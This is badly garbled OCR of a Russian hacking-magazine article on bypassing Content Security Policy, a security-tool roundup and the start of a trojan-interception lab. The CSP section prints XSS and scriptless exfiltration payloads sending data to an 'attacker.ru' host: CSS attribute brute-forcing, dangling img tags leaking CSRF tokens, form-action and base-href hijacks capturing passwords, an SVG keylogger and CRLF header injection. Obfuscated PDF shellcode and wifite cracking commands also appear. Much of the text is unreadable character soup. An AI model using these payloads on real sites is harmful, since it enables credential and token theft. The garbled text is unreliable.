"у10] афед-а1гес1уе": "5$сг1рЕ-згс Пр: / /сап. += 
фез*.ги Ир: //азах. =0о021еар1$.сот", 
"0Г151па1-ро11су": "5сг1ре-згс НЁр: 


сап.Ее$е. ++ 


ги Ир: //адах.50021еар1$.сот; герогЕ-иг1 += 


/сэр_герог*_рагзег" 


Получая отчеты, разработчик решает, какие источники нуж- 
но разрешить, и соответствующим образом обновляет полити- 
ку — вручную либо с помощью специальных средств. Например, 
для Вибу есть дет от компании ТммЦег — зесигепеаадег$ (ПИ рз:// 
а{пиб.сот/ м Чег/зесигейпеааег$), позволяющий не только на- 
строить СР, но и установить другие модные заголовки, вроде 
Х-х$$-Рихесйоп, Х-Сощет-Туре-Орйоп$ и другие. 

Все бы хорошо, но почти в 100% случаев разработчик стол- 
кнется с проблемой инлайн-скриптов. Дело в том, что СЗР 1.0 
может либо полностью разрешить их, либо запретить, третьего 
не дано. Стандарт рассматривает инлайн-скрипты как боль- 
шое зло, однако полностью отказаться от них в угоду СЗР 
на обычном сайте, на котором заранее не планировалось раз- 
ворачивать СЗР едва ли удастся. Поэтому, указав в $сир{-$гс 
'ипзае-ш!те’, разработчик автоматически открывает все двери 
для атакующего. 

В разрабатываемой на данный момент спецификации 
СР 1.1 есть частичное решение для этой проблемы — директи- 
ва эсир{-попсе, которая позволяет задать некое уникальное зна- 
чение-токен для всех разрешенных скриптов. Таким образом, 
блокируются не все инлайн-скрипты, а только неизвестные: 


<5сг1рЕ попсе="9са+6439с7876е703е307864с9167а15"> 
а1ег* ("а11омеа"); 


91гесф1\уе: "5сгтр+-згс '5е\{'", 
› | 


[1 >= & © <юрНате> я @ | Етог5 \Магптдз 109$ ОеБид 


ЕетепЕ5 КВезоугсез Мебмогк 5оигсез Титейте РгоНез АцдИ$ | Сопзое | х 


© ВеТизе4д То Тоад +Ве зсгаре 'Н4+р://гар0г.пате/х$5.]5' Бесаизе 14 узо|1афез +Ве №011 ом1пд Сопфепф 5есигафу Ро|11су 


АА 


Отличный вводный 
материал по СР: 


13.0 Ч/КЕБ\\об 


Таблица совместимости 
СЗР вразличных браузе- 


рах: 15.д4/ахзсУа 


Исследование $спр{ез$- 
атак от Марио Хайдери- 


ха: 15.а4/6МОКг 


Статья по $спрИез$$- 
техникам от Михала 


Залевски: 15. //Втг9ат 


Демо и презентации 
по С$5-атакам: 


р42.и5/с$5 


и 
Нарушение С$Р в кон- 
соли СИготе 


о! 
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</5сг1р> 
<5сг1ре> 

а1еге("поф а11омеа"); 
</5сг1ре> 


Очевидно, что такой подход не поможет защититься от слу- 
чаев, когда у атакующего есть возможность внедрить код 
в скрипт с валидным токеном. Кроме того, есть масса вариан- 
тов обхода, о чем пойдет речь ниже. 


СВЕР!МУЕСТЮОМ 

При наличии САЁЕ-инъекции в заголовках ответа, то есть от- 
сутствии фильтрации символа переноса строки, у атакующего 
есть возможность банального обхода СЗР с помощью внедре- 
ния собственных директив. Здесь большую роль играет то, 
какой заголовок браузер будет использовать при наличии не- 
скольких с одинаковым именем. Как в случае с НТТР Рагатщег 
Ро!иНоп, где одинаковые имена параметров обрабатываются 
по-разному на разных платформах, при внедрении еще одного 
заголовка Сощещ-Зеситу-Ройсу важно, где он окажется — пе- 
ред первоначальным или после него, так как один браузер мо- 
жет взять последний заголовок, а другой — первый. Так, если 
браузер отдает приоритет первому и мы внедряем наш СЗР 
перед настоящим, то обход тривиален: 


НТТР/1.1 200 ОК 

5е{-Соок1е: 1апвиаве=ги; 
Сопфеп*-5есиг1%у-Ро11су: $сг1ре-$игс += 
'ипза+е-1п11пе' * 

Сопфеп*-5есиг1%у-Ро11су: деРач1]-згс "5е14+"' 


Если же используется последний встреченный заголовок, 
то мы можем отправить его в тело страницы, отправив \г\п\г\п: 


ги; \^\пСопфеп*-5$есиг1у-Ро11су: $сг1ре-$гс += 
'ипза+е-1п11пе' *\г\п\г\п 


На выходе получим: 


НТТР/1.1 200 ОК 

5е{-Соок1е: 1апвиаве=ги; 
Сопфеп*-5есиг1%у-Ро11су: $сг1ре-$гс «= 
'ипза+е-1п11пе' * 


Сопфеп*-5есиг1%у-Ро11су: дефанч1]-згс "5е14+"' 


Таким образом, первоначальный заголовок попадет в со- 
держание НТТР-ответа и не будет иметь силы. 


ЗСЕИРТЕЕ$ $ АТТАСК$ 

Перейдем к более интересным вариантам обхода — на стороне 
клиента. Основная цель межсайтового скриптинга — получить 
приватную информацию пользователя, которая обычно хра- 
нится в сооКе. Однако с введением таких мер защиты, как флаг 
ПрОту, запрещающий /$-скриптам доступ к защищаемым 
сооке, внедрением в браузеры Х$$-фильтров (Х$$ АчцаЙог 
в Спготе, ХЗЗРЕЩег в |3), собственно и самого СЗР исследовате- 
ли безопасности все чаще обращают внимание на другие цели, 
например личные данные, различного родатокены (СЪВЕ оАщи, 
в скором будущем и зспр{-попсе). При этом используются новые 
способы отправки данных на сторонние сайты, без Чауа$спири 


С5ЗАВ 

Еще в 2008 году Эдуардо Вела (Едцагао Ува), Дэвид Линд- 
сей (Вама Мпазау) и Гарет Хейес (Сагай Неуе$) представили 
технику чтения атрибутов тегов с помощью С$$-селекторов. 
На данный момент техника все так же актуальна. Если рань- 
ше она позиционировалась как обход МоЗсируф, то сейчас ее 
можно использовать и для СЗР Суть СЗЗАА (С$$ АНибще 
Веаато) в брутфорсе значений с помощью селекторов атрибу- 
тов. Для этого на уязвимую страницу подключается С$$-файл 
с комбинациями выражений: 


1приуа1ие^=а (_{БасКёгоипа : «= 
иг1 (ПЕЕр: //аЕфасКег.ги/?а)} 
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|] С55$ АЕПЬие ВеадегРго х 


> С | Г еаеа.зидагсКсаЕ.пе са 


ЗА) Язык этой страницы | английский 


Те уаше 15: 1337 


Еетеп(5 Везоигсе$ | МебмюогКк | боигсез Титейште Рго еб АцдИ5 Сопзое 


Мате к 
Ра ТехЕ ты 


Меёфод абы Туре 


те Тите 
СопбепЕ | Габепсу 


Сотеп+5есищту Ро!/су — опасная политика 


`Рагзег ов 
'‚пдех.рЬр?Баскепд&9=Ап&=1337 200 пдех.рЬр:1 553 В 
СЕТ вех... 


Рагзег ОВ 


Г ПР , т ежу: 


/свзаг/№2 [®] 4 


/с5заг/№2 


пдех.рЬр?с5$=3&9=геат9&1378042493 200 'еаеа.... 
М кссагМ2 СЕТ ок (ехс55 
/с55аг/у2 


2.6 КВ 


ВедигесЕ 38.7 КВ 


БЕр://еаеа.... 458 В 


ВедигесЕ ОВ 


'пдех.рЬр?с$5$=5&9=геат9&1378042493 302 
РИР СЕТ т вех... 
| у 


/с5заг/№2 


пдех.рЬр?с55$=4&9=геат9&1378042493 302 'еаеа.... 458 В 
РРР СЕТ вех... 
ВедгесЕ ОВ 


Роупа9 
Ые5Нее[$ $спрЁ$ ХНВ Гоп 


-_ /с$$аг/\2 


2, >= Аа := ® © 01 оостепе таде$ 


Если значение целевого инпута начинается с «а», то будет 
отправлен запрос на сайт атакующего через подгрузку фоново- 
го изображения, относящегося к соответствующей комбинации 
символов. С$$ не имеет возможности указать позицию симво- 
ла, поэтому для получения следующего знака необходимо сге- 
нерировать массу вариантов вида 


1при\уа1ие^=аа (_{БаскКагоипа: «= 
иг1 (ПЕЪр: //аЕфасКег.ги/?аа)} 


Поэтому конечный РоС может иметь объем в несколько сотен 
килобайтов. 


РОЗТСАВО$ ЕВОМ РОЗТ-Х$$ \ММОВЕО 

Интересные идеи предложил Михал Залевски (Мпа! Гаем к! 
Например, имея внедрение кода перед формой, защищенно 
С$АЕ-токеном, можно вставить незакрытый тег итд: 


} 
й 


<1т8 эгс=" Пр: / /аЕЖасКег.ги?с= 


Все содержание страницы до следующей закрывающей ка- 
вычки, включая и целевой токен, после незакрытого атрибута 
$гс будет отправлено на сайт атакующего. 

Другой вектор — использование тега <фехфагеа>, который 
работает как СВАТА в ХМЕ. Внутри {ежагеа допускаются любые 
символы, однако в отличие от предыдущего способа отправить 
полное содержание страницы можно только при участии поль- 
зователя, который должен самостоятельно отправить форму. 

Еще один способ использует тот факт, что формы не могут 
быть вложенными, поэтому внедрение незакрытого тега <Юпт> 
перед целевой формой позволяет перенаправить ее данные 
на хост атакующего: 


<Фогт асЕ1оп= ' Пр: //а*Фаскег.ги/1о.рйр' > 


<Фогт асЕ1оп=' 1021п.рИр' > 

<1при{ фуре="ФехЕ" пате="1021п"> 

<1при* фуре="раззмога" пате="ра$$мога" > 
</Фогт> 


Аналогичного результата можно достичь при помощи век- 
тора с использованием тега <Базе>, который определяет УВЕ 
для всех относительных путей на странице. Согласно стандар- 
ту, тег должен быть включен внутри <Пеаа>, однако большин- 
ство браузеров допускают использование тега в любом месте: 


<Базе Нге+=' Вр: //аЕфаскег.ги/' > 

<Фогт асЕ1оп=' 1051п.рИр' > 

<1приф фуре="ФехЕ" пате="1021п"> 

<1при* фуре="раззмога" пате="ра$$мога" > 
</Фогт> 


$У@-КЕИЛОГГЕР 
Не менее интересные способы отправки личных данных 
на сторонние сайты в обход СЗР можно встретить в исследо- 
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7 запросов ЗКВ (402 В из кеша) 1.395 (отюаЧ: 388т5$) 


ваниях Марио Хайдериха (Мапо Неаепсп). Один из них играет 
роль настоящего кейлоггера при помощи тегов <$\49> и <$4>. 
Официальная и документированная \\3С-фича ассез$Кеу 
внутри <5$е> позволяет привязать нажатия клавиш к иниции- 
рованию НТТР-запросов — идеально для реализации кейлог- 
гера, причем без использования 1$! Внедрив следующий код 
на страницу с формой авторизации, можно перехватить нажа- 
тия клавиш пользователя и, соответственно, логин и пароль: 


<5\8 Пе1ёйт="9рх"> 

<1таёе хт1п5:х11пК=" Ир: //ммм.м3 .ог8/1999/х11пК" += 
х11 пк: Иге{="попе" > 

<5е{ а г1Бифемате="х11пК :Игеф" «= 
Бе21п="ассезКеу(а)" фо=" //аЕасКег.ги/?а" /> 

<5е{ а г1Бифемате="х11пК :Игеф" «= 
Беё1п="ассезКеу(Ь)" фо=" //аЕасКкег.ги/?6" /> 

<5е{ а г1Бифемате="х11пК :Игеф" «= 
Беё1п="ассез$Кеу(с)" фо=" //аЕасКег.ги/?с" /> 


</1таёе> ЕЕ 


</$\5> 


ЧТЕНИЕ АТРИБУТОВ СПОМОЩЬЮ... СКРОЛЛБАРОВ 
Пожалуй, самая интересная зспр{е$$-атака в обход СЗР — чте- 
ние атрибутов с помощью С$$, З\/@ и скроллбаров в \ММебки 
от того же Марио Хайдериха. Один из принципов атаки ана- 
логичен СЗЗАА — с помощью С$$-селекторов содержание 
атрибута можно выразить через РОМ, но уже селектором :аКег 
с С5$-выражением вида сощет: аНк(ИгеР) (для ссылок). Даль- 
ше интересней — для каждого такого элемента с содержани- 
ем атрибута можно присвоить 5\/С-шрифт. В шрифте имеется 
лишь один символ, таким образом, остальные символы в целе- 
вом атрибуте не будут иметь физического размера на странице. 
Если «сжать» значение, то с помощью скроллбаров можно вы- 
яснить, какой символ содержится в значении, используя специ- 
альный селектор для указания фонового изображения при по- 
явлении скроллбара: 


Ч1\.а: : -мебКк1* -зсго1]Баг-%гаск- 
р1есе : уег{1са1 :1псгетеп* { 
Баскёгоипа: геа ичг1(/А); 


} 


Техника позволяет извлекать СЪЗНВЕ-токены за меньшее ко- 
личество запросов и с помощью меньшего по размеру эксплой- 
та, нежели СЗЗАН. Демо смотри здесь: ой./у/з57Ни1. 


ЕМ 

Сощет Зесищу Ройсу — большой шаг в сторону более без- 
опасного веба. В перспективе веб-стандарт может серьезно 
повлиять на клиент-сайд атаки как класс. Если сейчас на боль- 
шинстве уязвимых к Х5$ сайтам угнать куки можно обычными 
/$-векторами, то в будущем с распространением С$Р в мас- 
сы все будет не так просто. А это подтолкнет исследователей 
кеще более изошренным техникам, нацеленным на уязвимости 
в особенностях реализации С$Р в конкретных браузерах. == 


$4 Взлом 


У\УАВММС 


Внимание! Информация представлена исключи- 
тельно с целью ознакомления! Ни авторы, ни редак- 
ция затвои действия ответственности не несут! 
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Дмитрий «0191» Евдокимов, 
Ого На! Зесигйу 


@еудокКито\@$ 


Х-ТООЕЗ 


СОФТ ДЛЯ ВЗЛОМА И АНАЛИЗА БЕЗОПАСНОСТИ 


Автор: Пто{Пу 
Могдап 

ОВЕ: пЕрз://соде. 
дооде.сот/р/ 


Бесше 
Система: \Ип4о\м5/ 


Ипих 


КРИПТА 
Если в приложении используется криптография, 
надо проверить, насколько правильно она реали- 
зована (огромное количество разработчиков за- 
ново изобретают велосипед и пишут свою реали- 
зацию АЕЗ$, естественно с кучей ошибок). С этой 
задачей часто приходится работать как при ис- 
следовании софта, так и при играх в СТЕ. 

Вастеу представляет собой набор РуПоп- 
инструментов, который может серьезно помочь 
в криптоанализе. Набор состоит из следующих 
консольных утилит: 

. БасШеу-апауте — анализирует файл с за- 
шифрованной информацией и пытается де- 
кодировать и идентифицировать полезные 
паттерны при криптоанализе; 

. Бастеу-епсоае — простой инструмент 
для кодирования произвольных данных, ис- 
пользует цепочку энкодеров; 

. БасНеу-десоае — инструмент, выполняющий 
действия, обратные предыдущему инстру- 
менту; 

. БасНмеу-ПИр2ру — парсит НТТР-запрос (из 
зат или файла) и генерирует РУПоп-скрипт 
для отправки тех же или измененных данных; 

. БасШеу-пехгапа — вычисляет состояние эк- 
земпляра уауа Вапаот с!а5$, получив два по- 
следовательных значения от пехИп((). 


Также доступны три Ру{Поп-библиотеки, кото- 
рые могут быть весьма полезны. Во [оо!$ может 
быть использована для автоматического опреде- 
ления наиболее вероятного алгоритма кодиро- 
вания; БиНейоо!$ содержит набор инструментов 
для манипулирования двоичными буферами 
шифрованного текста; СВС содержит различные 
инструменты для проведения атак на данные, за- 
шифрованные с помощью блочного шифра СВС. 


Автор: Оегу Мегкег 


ЦВЕ: ПЕре: //соде. 
9), ирдатез и: е ы дооде.сот/рдм\е 


Система: Мпих 


[0:08:34] 


МПЕТТЕ \2 

\М-Н-сети сейчас окружают нас везде: дома, 

на работе, в кафе, гостинице. Их стало очень 

много, а людей, разбирающихся в грамотной на- 

стройке, так много не становится. В итоге получа- 

ем идеальное пространство для атаки. 
Мите — это программа, написанная на РуУПоп 

и предназначенная для атак на беспроводные 

сети, защищенные \М\/ЕР, \М/РА или \\Р$. Приложе- 

ние работает в консольном режиме (в последней 

СЧ-режим убрали). Особенности утилиты: 

. одновременная атака нескольких сетей; 

. последовательность взлома по уровню сиг- 
нала; 

. автоматическая деаутентификация клиентов 
для определения скрытого 5510 сети; 

. фильтры для определения цели; 

. автоматическая смена МАС при атаке; 

. запись всех ММ/РА папазпакез$ в текущую дирек- 
торию; 

. \М/РА-деаутентификация; 

. возможность приостановки и возобновления 
атаки; 

. Интеграция с геауег для взлома МР5. 


Пример запуска на взлом всех точек доступа, 
защищенных МЕР: 


./м1Афе.ру -а11 -мер 


Для взлома \МР$ хендшейка по словарю 
ппуд!+.1$1: 


./м1Афе.ру -а11 --а1с® /репфе$&/- 
ра$$мога$ /мога11$%$ /ту1се. 1$ 


Для корректной работы нужен установленный 
аигсгаск-пд. 


Автор: Ап Абогапат 
УВЕ: 000.0 /@СТ7МА 


Система: \\М\пЧ0\$ 
ЕМОМЕ; МЕВКТ 


ВКОМ/$ЕН: СНКОМЕ 
УЕВЗЮН: 25.0 


ЕМСМЕ: ТАОЕМТ 
ВНО\МУ$ЕН: ИЧТЕЯМЕТ ЕХРЕОВЕЙ 
УЕЯЗЮМ: 7.0 


ВСЕЛЮБЯТХ$$ 

Встречай новый проект от ОМ/АЗР под названием 
Хепойх Х$$ Ехрюй Егате\могк. Данный инстру- 
мент представляет собой фреймворк для поиска 
и эксплуатации Сго$$ Э\е Зсирипта уязвимостей. 
Для исключения ложных срабатываний из скани- 
рования Хепойх использует встроенный сканер 
и три различных движка: Тпает, \Меб ки и Сеско. 
На текущий момент инструмент имеет более 1500 
полезных нагрузок для обнаружения Х$$ и обхо- 
да\МАЕ При этом также реализован модуль сбора 
информации для разведывательно-подготови- 
тельных работ. 

В наличии есть атакующий Х$$-модуль, ко- 
торый может быть полезен в тестах на проник- 
новение и создании ргооР о{ сопсерт. Выделю 
наиболее интересные возможности, которые 
предоставляет данный фреймворк: 

. угон соокКе; 


. ризпег; 
. фабпаббтча; 
. Кеуоосдег; 


‚ НТМЕБ Обоб$ег; 

. ЕхесщаЫе Опуе-Бу; 

. Чамазсиру 5пе!; 

.  Гемегзе НТТР Мер пей; 

. Оийме-Бу Веуегзе $Зпе!; 

. Маазрок Вгом/зег Ехр!онК. 


Не стоит забывать о множестве режимов ска- 
нирования: полностью ручной, автоматический, 
ООМ-сканер, сканер РОЗТ-запросов, сканер за- 
головков, фаззер и даже сканер скрытых параме- 
тров. 

Также нельзя не выделить целый набор аддо- 
нов, заточенных под Е!еТох: Веуегзе пей, Зезюп 
ЗЧеаег, Кеуюодаег, Шпих Сгедепна! Ее Зеаег 
и Бомоач апа Ехесще. 
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5. тпИме РОБ $ реагл5 С =10[х| 
коа4_Ре Ехоюиз_5сап За’азобА МТ Цлвесаре_5е8сбой Мог Еесарея Прфав_Озтеск_Этези око ОБрк | Зеаил_Р РиЧТерасв  Тосб 
Нахэмпо Ипезсаов (Ривзвеча Ао 5расв) 2 озохириея:_АВ 
Тиисф1оп па4п(){ Нехэмпо игезсаов (5р Ин ие 5расе) 
аг 5сС5 = ипе5са] злежаре 
4494911494" + "9%14 каре 
4230#14231%и6641* ‘луьжаре 

№447 5%117 939%14460 хшезеара 
7136с#141355и6368: об лЕсара 

47 265 %и6е69%45466: — ЕхьасЕ ба Рис О Раде баба 
7350157445617 змъ6ъажиа 95а 


2 Соприсз5 28 

ЕЕ Рогое_Оестуре 
14 изо сви 656 — 
142 ЕРопь за №644 ЕХРОЕ Оекосйсгв 
и воЕзкаре Неадытя 
и Из Рогть\ Нездегя 

НЫз Наадег Опы ОБ 
у НЭз бирбсае 5теате 


КОПАЕМСЯ ВРОР 


кодами. А для удобной работы с по- 


$ НБеы: 0и11 
9 НЕча: ОА 


ро дым С РОЕ уже давно стал излюбленным 


Ъ31%и6е70%44е179%и 
842#13965%и4564% 41615%14444% 


46364 %115434%4935%и607 5%и636Ъ%и4167%и3534% 7 а51%и5145%46076%и346Ъ%и304с% форматом среди вирусописате- следними присутствует интеграция 
6е41>514165%и1541Е%5а3 54с#и6а515и6е46% 47 66 5ибебсни 4367 а3 15 4с46#173495 ый 
45160%15634%и464%43073%и4 [31%и5230%44044%и7365%14470%44070%45945%и4150% лей и багхантеров. Так что часто с $сарда (от того же автора, рассмо- 
и ре м 
я приходится либо изучать чей-то — трен нами в предыдущих номерах). 
ен РОЕ-эксплойт, либо писать свой :). — Что доступно под капотом: 
| т 6аи34354и5162413263%14352%47045м164621346е%и3530%15438% И делать все это хочется в удобной поддержка множества фильтров; 
Кони среде. В этом как раз и помогает ‚ применение цепочки фильтров 
| ке ЕЕК ипе5саре ("%а0АОА"+ "ха0ОАОА") ; ха 
ор Зера Зет ЕЕК Ч РОЕ З\геат Битрег. Это бесплатный к потоку; 
Зале АПВ адм уе мп 2ета11=) 228112 
ПЕНА НЕВЕ инструмент для анализа вредонос- ‚ Просмотр заголовков, объектов 
Бава ных РОЕ-файлов, он также предна- и потоков; 
Е № 1 значен для вспомогательных задач . чауабспир1-деобфускатор; 
Ию БЕГОЕа [Веаксв] ке 
Зе | рог раль 7: \раГ ехрлолев\рЕЕАЫЕ вж10118\ватрлев\ Чака. раг = Гоаа | по разработке эксплоитов под РОЕ- у генерация отчетов. 
| Эсгеяш=: 18 | 908: 6 Ешье4=: О | Расе=: 2 ТТР: 0 Гузь: 0 | +1азь: О ОркР1Е: О | АсЕзол: 6 ридеры. 


Автор: Бама 7ттег 


УВЕ: до0.д/еСВКа\/ 


Система: \\ п 0\$ 


Автор: ОКпОск 
ОВЕ: зрацу.зесписпе. 


ВОИН СПАРТЫ 
Зраму — это простой и надежный инструмент 
с открытым исходным кодом для проверки 


веб-приложений, использующих архитектуры 
ЗпагеРой!{ и ЕгощРасе. Так уж сложилось, что ад- 
министрировать подобные приложения довольно 
нелегко, поэтому Зра\у может оказать поистине 
неоценимую помощь. Этот инструмент предо- 
ставляет все необходимое для удобного сбора 
информации, проверки прав разграничения до- 
ступа, идентификации критичной информации 
в файлах по умолчанию. При необходимости тул- 
за даже сможет продемонстрировать эксплуата- 
цию для найденной уязвимости. 
Основной функционал версии 0.1: 
. Детектирование основных версий ЗпагеРотт 
и РотРаде; 
’ дамп паролей из открытых файлов конфигу- 


В основном инструмент заточен 
с обфусцированным 
Чауа$сиргом, низкоуровневыми за- 
головками РОЕ объектами и шелл- 


для работы 


Автор: Мапа!ап{ 


ОВЕ: доо.а/Кт16бт9 


СРапчей рект15510п$5 $0 аЯт1п-о 
151109 зе е1пч5 #11е С:\Ркодкап 


у32ркосеззез-тептоку, 
\324клоек;—з19пабике ‚„ 


\32Чклоек5 -тоди1е 115%, 

\32Кекпе1—НооК4ефесЕтоп „ 

\32ркосез5е;-тепокуасцитн 

\324клоек-петокуасдитее , 
Е116ек Моди1ез: 


храфй, 1.4.36.0 
хра®И2у2, 1.4.36.0 
кедех, 1.4.36.0 


АНАЛИЗАТОР ДАМПОВ ПАМЯТИ 
Программу Метогуге в кругах компьютерных кри- 
миналистов знают не понаслышке. Это мощней- 
шее средство анализа памяти для многих стало 
частью джентльменского набора, настоящей про- 
граммой ти${ Пауе, которая не просто лежит про 
запас для подходящего случая, а действительно 
часто используется. Что мы можем получить, ис- 
пользуя Метогуге: 

. полный образ всего диапазона системной 
памяти (без использования АР!-вызовов), со- 
храненный в файл для дальнейшего анализа; 

. дамп адресного пространства любого процес- 
са, включая список загруженных ОШ и ЕХЕ, 
кучу и стек (этот дамп можно дальше исследо- 
вать в дизассемблере); 

. образ всех загруженных драйверов или только 
некоторых из них; 


кечеху2, 1.4.36.0 


При этом инструмент имеет свои 
скрипты для автоматизации рутин- 
ных задач и плагины для расширения 
начального функционала. 


./ВОРдаддеф [ЕЕАС5] <Б\пагу> [1 Авторы: уопаап 


бамап, АЙап МИА 


ога ми ЬЫй = Система: ММпдом$ таке | ЦВЕ: 900.0/0Е72е! 
Система: \//п0о\м$/ Е а: о Система: \/п0ом5/ 
Ипих З2пепогу-асци4 410. -БАпд <рогт> Ипих 


-Атрог{5с <5Весоде> 


<иогд> 
<иогд> 


- Рег 
-опТу 


-орсоде <орсоде> 
-5ЕГАП9 <${г1п9> 
-а5т <1п5гус(10п$> 


Ам <п> 
-тпар <5Фаг*-епд> 


ВОР-ВОР-ВОР-ВОР 

Тема поиска ВОР гаджетов и цепочек уже неодно- 
кратно освещалась в данной рубрике, но иссле- 
дователи не стоят на месте, и на сцене появля- 
ются все новые и новые инструменты, которые 
значительно упрощают процесс написания ВОР- 
шелл-кодов. 

АОРодааде, как нетрудно догадаться, — это 
инструмент для поиска ВОР-гаджетоввЕЁЕ (Ипих) 
иРЕ (\М/пао\м$) бинарных файлах. Программа пол- 
ностью написана на Си. На текущий момент есть 
поддержка Шпих х86/х64 и ММпаом$ х8б. 

При этом (пока только) для операционной си- 
стемы Шпих реализована такая фишка, как авто- 
матическая генерация ВОР рауюоаа! Инструмент 
не просто ищет полезные ВОР-гаджеты, но и сра- 
зу конструирует из них последовательность, 
реализующую вызов ехесуе() с произвольным 


рации; . полный список всех процессов, включая набором параметров. Для ММпао\м/$ данный функ- 
. сканирование уязвимых ЗпагеРот УРготРаде- спрятанные руткитами, причем для каждого ционал находится в стадии разработки. 
сервисов; процесса есть возможность определить все Из интересных фишек также можно выделить: 


. проверка уязвимых директорий; 

. проверка установленных файлов и их прав; 
. запрос НРС-сервиса; 

. перечисление файлов; 

. проверка возможности загрузки файлов. 


Так что теперь поиск и проверка таких файлов, 
как зегмсе.рма, зегмсе.дгр, аатии$гатог$.рма, 
ашщПог$.рммА и изег$.рма, происходит автомати- 
чески. 

В следующих версиях автор собирается доба- 
вить новые проверки пейлодов на основе аатт. 
ЧН и ащПог.аЙ. Ну и естественно, в новой версии 
появится информация о свежих уязвимостях. 

Инструмент впервые был официально пред- 
ставлен на Васк На УЗА Агзепа! 2013 в Лас- 
Вегасе. 


хендлы (например, используемых файлов или 
ключей реестра), сетевые сокеты, импортиру- 
емые и экспортируемые функции и так далее; 

. все строковые переменные, используемые 
процессами; 

. полный список всех драйверов, втом числете, 
которые маскируются малварью; 

. перечень всех модулей ядра; 

. перечисление всех установленных хуков (они 
часто используются малварью). 


Инструмент достаточно уникальный в своем 
классе, и единственным его конкурентом можно 
назвать УоанЩу. И то скорее лучше их использо- 
вать в связке при анализе инцидентов и малвари. 
Так что это точно ти${ Пауе в наборе специалиста 
по расследованию инцидентов. 


. Поддержку ще и АТ&Т синтаксиса; 

. поддержку фильтров при поиске НОР- 
гаджетов; 

. поиск конкретных инструкций; 

. Поддержку нескольких форматов вывода: 
РУпоп, Рен, С, РНР. 


В качестве альтернативных ВОРостроителей 
можно вспомнить ВорМе, Мопа.ру для ппт0ОБа 
и мастодонта ОрйВОР, представленного на Васк 
На! ЧЗА 2013. То, что появился еще один инте- 
ресный инструмент, не может не радовать. Тема 
автоматизации построения гаджетов и их це- 
почек становится все более актуальной среди 
эксплойтописателей. Ведь не за горами время, 
когда без ВОР оту шелл-кода будет не обойтись 
(как уже сейчас в 05). 


56 Ма/!игаге 
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НАСАДИ ТРОЯН 


НА КУКАН: 


Перехват 

и динамиче- 
ское изменение 
НТТР-пакетов 
ПО для удален- 
ного админи- 
стрирования 


ВСТУПЛЕНИЕ 

Сегодня мы с тобой поиграем в одну игру. Пред- 
ставь, как будто мы вирусные аналитики с боль- 
шой зарплатой и бесплатной кофемашиной. 
Перед нами стоит задача перехватить отчет тро- 
яна об успешной установке и перенаправить его 
на другую почту, а также узнать, кому он предна- 
значался. Неплохая задача? Поехали! 


УДАЛЕННЫЕ АДМИНИСТРАТОРЫ 
Для начала отметим, что средства, предназна- 
ченные для удаленного доступа на чужие ма- 
шины, сейчас весьма популярны. В публичном 
доступе они представлены довольно широким 
ассортиментом. Чаще всего встречаются АМ$5, 
БакСотет, Субег@аае, Хиете ВАТ. 
В число их функций может входить: 
. полный доступ к системной информации; 
. контроль над всеми процессами; 
. просмотр и изменение регистра; 
. удаленное управление (ВОР); 
. выполнение произвольного кода; 
. просмотр/изменение/копирование/удаление 
файлов; 
. прослушка/запись микрофона и веб-камеры; 


Оумаг 
тгдумаг@дтай.сот 


» 


. Доступ к паролям браузеров (социальные 
сети, почта, банкинг); 

. Доступ к компьютерам твоей локальной сети; 

. принтер, роутер и много другого. 


В данной статье мы рассмотрим троян на ос- 
нове легального программного продукта компании 
Текюп!1. Его отличают доступность, надежность 
и высокий «пробив». Эти положительные качества 
обеспечили его высокую популярность в узких кру- 
гах любителей приключений. Наша задача — пере- 
хватить отчет трояна о его успешной установке 
и перенаправить на другую почту, а также узнать 
изначального получателя, то есть мастера. 


НАСТРОЙКА ОКРУЖЕНИЯ 

Для решения такой задачи нам понадобится вир- 
туальная среда. В данном случае мы используем 
бесплатный программный продукт под названи- 
ем МщчиаВох ( =  ____). Скачиваем, 
устанавливаем, если возникнут сложности — 
обращаемся к инструкции на сайте. Запускаем, 
создаем две виртуальные машины под управле- 
нием \/птаом/$. Первая будет перехватчиком, вто- 
рая — предназначена для заражения (Попеуро`). 
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Настройки перехватчика 


Вок 1.ь (УМ вех 40142 (тол Лтупк-1.8)] 


70 <тапдаг4 диегу 0х04е5 А гтапзу%.ги 


Наш пакет 


Почему так, ведь все можно сделать на одной? 
Можно, но лучше не стоит — некоторые умель- 
цы делают защиту от подобного вида контра- 
так, и, создав две машины, мы избавим себя 
от лишних хлопот. Далее нам необходимо уста- 
новить на наш перехватчик собственно инстру- 
ментарий. Качаем и устанавливаем Вигр Зийе 
‚роизмлаадегпе/рир === миезпагк.ога/ 
до\ипоаа. Пий | | 

Переходим к настройке сети (Устройства -—› 
Сетевые адаптеры). Перехватчик имеет два сете- 
вых интерфейса: 1) \\МАМ — МАТ, имеет выход в ин- 
тернет; 2) ТАМ (192.168.0.1) — локальная сеть СМ// 
ОМ (!1Р МАМ интерфейса), имя те, неразбор- 
чивый режим — разрешить ВМ. Вторая машина 
имеет только ГАМ-интерфейс с С\М\, равным 1Р ТАМ 
перехватчика. Также сразу можешь установить 
прокси в настройках Е на 192.168.0.1 порт 80, ак- 
тивировав галочку «Использовать для локальных 
подключений». Где взять экземпляр трояна, гово- 
рить не буду :). 


ЗАПУСК И ПЕРЕХВАТ 
Теперь, когда базовые настройки законче- 
ны, запускаем на первой машине Вигр Зийе 


Насади троян на кукан! 


Настройки По$1$ 


с1е Мапрша‘юг Зуз1е 


Письмо напочту 


и \ММтезпагк, на второй — наш троян. Смотрим 
лог \\Ипезпагк, наблюдаем возросшую сетевую 
активность зараженной машины. Троян срабо- 
тал и пытается связаться с сервером, в нашем 
случае он ищет разрешение имени ТекопТ` ши- 
роковещательным запросом на адрес 255. На- 
блюдаем, записываем адреса и порты. Теперь 
переходим к настройкам Вигр ЗиКе, выставляем 
их в соответствии с картинкой «Настройки пере- 
хватчика». 

Ловушка для пакетов установлена, можно 
переходить к следующему этапу. В зараженной 
машине нажимаем клавиши <\\№т + В> и наби- 
раем команду %\мипан%/зучет3 2/апмег$/вс/ 
по$5, открываем файл в блокноте и вписываем 
имя сервера, который ищет наш троян, указав, 
что он расположен на ГАМ-адресе нашего пере- 
хватчика (192.168.0.1). 

Сохраняем, закрываем, изменения вступа- 
ют в силу немедленно. Троян получает заветный 
|Р-адрес, на котором якобы расположен иско- 
мый сервер. Как результат, великий и могучий 
Вигр Зийе словил первый пакет ше 14 поШу. 
рир’е${=1. Ничего особенного тут нет, просто те- 
стовый запрос, пропускаем. 


ЛЕГАЛЬНОЕ 

ПО — это 

ВАМ НЕ ТРОЯН 
КАКОИ-НИБУДЬ! 


АМ$ не троян, 

